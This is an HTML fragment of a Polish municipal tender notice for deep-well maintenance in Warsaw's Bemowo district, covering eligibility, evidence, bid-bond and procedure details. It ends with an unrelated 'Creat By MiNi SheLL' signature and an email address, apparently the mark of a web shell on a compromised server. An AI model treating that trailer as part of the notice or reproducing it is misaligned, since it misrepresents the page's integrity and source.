nr 1<br/>jedną usługę polegającą na wykonaniu konserwacji (utrzymanie i eksploatacja) studni głębinowych (czwartorzędowych lub oligoceńskich), o wartości nie mniejszej niż 100.000,00 zł brutto zrealizowanej w ramach jednej umowy.<br/><br/>•	dla części zamówienia nr 2<br/>jedną usługę polegającą na wykonaniu konserwacji (utrzymanie i eksploatacja) studni głębinowych (czwartorzędowych lub oligoceńskich), o wartości nie mniejszej niż 100.000,00 zł brutto (w ramach jednej umowy).<br/><br/>W przypadku Wykonawcy składającego ofertę na dwie części zamówienia powyższy warunek zostanie uznany za spełniony również wtedy, gdy Wykonawca w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności był krótszy – w tym okresie, należycie wykonał a w przypadku świadczeń okresowych lub ciągłych również wykonuje w sposób należyty, co najmniej jedną usługę polegającą na wykonaniu konserwacji (utrzymanie i eksploatacja) studni głębinowych (czwartorzędowych lub oligoceńskich) o wartości zamówienia minimum 200.000,00 zł brutto – w ramach jednej umowy. <br/>Wykonawca składając ofertę na dwie części zamówienia nie może w celu wykazania spełnienia warunku udziału w postępowaniu posłużyć się tą samą usługą w obu częściach zamówienia.<br/>Wykonawca wykazujący swoje doświadczenie może uczynić to jedynie w zakresie, w którym sam je nabył. Jeśli doświadczenie zostało nabyte w ramach konsorcjum to przekazaniu podlegają zasoby powstałe jedynie w granicach wykonania prac przez dany podmiot.<br/>Warunek będzie uznany za spełniony, jeżeli co najmniej jeden z Wykonawców wspólnie ubiegających się o udzielenie zamówienia posiada wymagane doświadczenie zawodowe.<br/>Wstępnym potwierdzeniem spełniania warunku udziału w postępowaniu będzie złożone wraz z ofertą oświadczenie stanowiące załącznik nr 4 do SWZ. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">W celu potwierdzenia braku podstaw wykluczenia wykonawcy z udziału w postępowaniu, Zamawiający żąda następujących podmiotowych środków dowodowych oświadczenia wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności do tej samej grupy kapitałowej, w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2019 r. poz. 369, 1571 i 1667 z późn. zm.), z innym wykonawcą, który złożył odrębną ofertę, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej – wg załącznika nr 7 do SWZ;</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Oświadczenie o niepodleganiu wykluczeniu w zakresie wskazanym przez Zamawiającego. Oświadczenie składa się zgodnie z treścią załącznika nr 4 do SWZ.<br/>1)	W celu potwierdzenia spełniania przez Wykonawcę warunków udziału w postępowaniu dotyczących zdolności zawodowej, Zamawiający żąda: Wykazu usług (załącznik nr 8 do SWZ), o których mowa w Rozdziale VII ust.2 SWZ wykonanych, w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy –w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane. Do wykazu należy dołączyć dowody określające, czy ww. usługi zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego usługi zostały wykonane. Jeżeli Wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać ww. dowodów–oświadczenie wykonawcy</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie żąda przedmiotowych środków dowodowych <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Do oferty należy dołączyć:<br/>1)	dokument lub dokumenty, z którego (ych) będzie wynikać zakres umocowania. w przypadku, gdy ofertę w imieniu Wykonawcy podpisuje(ą) osoba(y) inna(e) niż ujawniona(e) w dokumentach rejestrowych;<br/>2)	pełnomocnictwo dla pełnomocnika do reprezentowania w postępowaniu Wykonawców wspólnie ubiegających się o udzielenie zamówienia – dotyczy ofert składanych przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia;<br/>Oferta składana przez spółki cywilne (ustawowo zdefiniowane w Tytule XXXI Księgi Trzeciej kodeksu cywilnego (Dz. U. 1964 r. Nr 16 poz. 934 ze zm.) oraz zgodnie z art. 4 ust. 2 ustawy Prawo przedsiębiorców (j.t. Dz. U. z 2018 r. poz. 646 ze zm.) jest traktowana, jako oferta Wykonawców wspólnie ubiegających się o udzielenie zamówienia publicznego (art. 58 ustawy Pzp) i solidarnie za nie odpowiadających.<br/>3)	oświadczenie Wykonawcy o niepodleganiu wykluczeniu z postępowania - wzór oświadczenia stanowi załącznik nr 4 do SWZ.<br/>4)	zobowiązanie podmiotu udostępniającego zasoby do oddania do dyspozycji Wykonawcy niezbędnych zasobów na potrzeby realizacji zamówienia – wymóg złożenia w przypadku, gdy Wykonawca polega na zdolnościach lub sytuacji podmiotów udostępniających zasoby - wzór zobowiązania stanowi załącznik nr 5 do SWZ;<br/>5)	oświadczenie składane na podstawie art. 117 ust. 4 ustawy, z którego wynika, które usługi wykonają poszczególni wykonawcy – wymóg złożenia w przypadku, gdy Wykonawcy wspólnie ubiegają się o udzielenie zamówienia - wzór oświadczenia stanowi załącznik nr 6 do SWZ. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1.	Oferta musi być zabezpieczona wadium w wysokości:<br/>1)	Część zamówienia nr 1 - 1.500,00 zł (słownie: tysiąc pięćset zł, 00/100),<br/>2)	Część zamówienia nr 2 - 1.500,00 zł (słownie: tysiąc pięćset zł, 00/100).<br/><br/>2.	Wadium należy wnieść przed upływem terminu składania ofert (data i godzina), określonym w Rozdziale XIV ust. 5<br/>3.	Za wadium wniesione w terminie uważa się:<br/>1)	dla wadium wnoszonego w pieniądzu - uznanie rachunku bankowego przez bank Zamawiającego przed upływem terminu składania ofert (data <br/>i godzina);<br/>2)	dla wadium wnoszonego w formie innej niż pieniężna - złożenie razem <br/>z ofertą na platformie zakupowej Zamawiającego (data i godzina).<br/>4.	Wykonawca zobowiązany jest wnieść wadium na cały okres związania ofertą. <br/>5.	Wadium można wnieść w jednej lub kilku niżej wymienionych formach <br/>(w zależności od wyboru Wykonawcy):<br/>1)	pieniądzu wpłaconym przelewem na rachunek bankowy Zamawiającego:<br/>Dzielnica Bemowo m.st. Warszawy, nr 03 1030 1508 0000 0005 5000 2043<br/>2)	gwarancjach bankowych;<br/>3)	gwarancjach ubezpieczeniowych;<br/>4)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 09.11.2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2019 poz. 319,836 i 1572), zwanej dalej PARP.<br/>6.	W przypadku wniesienia wadium w formie gwarancji lub poręczenia, koniecznym jest, aby gwarancja lub poręczenie:<br/>1)	obejmowały odpowiedzialność za wszystkie przypadki powodujące utratę wadium przez Wykonawcę określone w art. 98 ust. 6 ustawy;<br/>2)	nie zawierały postanowień uzależniających jego dalsze obowiązywanie od zwrotu oryginału dokumentu gwarancyjnego do Gwaranta/Poręczyciela;<br/>3)	jednoznacznie wskazywały podmiot, który złożył ofertę. <br/>Nieuwzględnienie powyższego w treści gwarancji/poręczenia spowoduje odrzucenie oferty na podstawie art. 226 ust. 1 pkt 14 ustawy.<br/>7.	Wadium w formie gwarancji lub poręczenia powinno być wniesione w oryginale<br/>w postaci dokumentu elektronicznego podpisanego kwalifikowanym podpisem elektronicznym przez Gwaranta/Poręczyciela.<br/>8.	Wadium wnoszone w poręczeniach bankowych, gwarancjach bankowych, gwarancjach ubezpieczeniowych i poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy o utworzeniu PARP musi zawierać stwierdzenie, że gwarant zobowiązuje się nieodwołalnie i bezwarunkowo pokryć wszelkie zobowiązania Wykonawcy wobec Zamawiającego wynikające z zapisów SWZ dotyczących wadium, do wysokości gwarantowanej kwoty, na pierwsze żądanie Zamawiającego przedstawione gwarantowi w formie pisemnej w okresie obowiązywania poręczenia (gwarancji).<br/>9.	Ww. gwarancje i poręczenia nie mogą wprowadzać żadnych dodatkowych warunków merytorycznych.<br/>10.	Przedłużenia ważności wadiów w formie innej niż pieniądz, w sytuacjach określonych w ustawie oraz z zachowaniem postanowień ust. 6-9 niniejszego Rozdziału, należy wnosić za pośrednictwem platformy https://zamowienia.um.warszawa.pl/servlet/HomeServlet <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> W odniesieniu do warunków dotyczących doświadczenia Wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z Wykonawców, którzy wykonają usługi, do realizacji których te zdolności są wymagane.<br/>W przypadku, o którym mowa w ust. 7 SWZ, Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które usługi wykonają poszczególni wykonawcy. Do oferty należy dołączyć pełnomocnictwo dla pełnomocnika do reprezentowania w postępowaniu Wykonawców wspólnie ubiegających się o udzielenie zamówienia – dotyczy ofert składanych przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia;<br/><br/>Oferta składana przez spółki cywilne (ustawowo zdefiniowane w Tytule XXXI Księgi Trzeciej kodeksu cywilnego (Dz. U. 1964 r. Nr 16 poz. 934 ze zm.) oraz zgodnie z art. 4 ust. 2 ustawy Prawo przedsiębiorców (j.t. Dz. U. z 2018 r. poz. 646 ze zm.) jest traktowana, jako oferta Wykonawców wspólnie ubiegających się o udzielenie zamówienia publicznego (art. 58 ustawy Pzp) i solidarnie za nie odpowiadających. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Rodzaj i zakres zmian umowy oraz warunków ich wprowadzenia wskazano we wzorze umowy - załączniku nr 3 do SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-09-07 12:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://zamowienia.um.warszawa.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-09-07 12:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-10-06</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com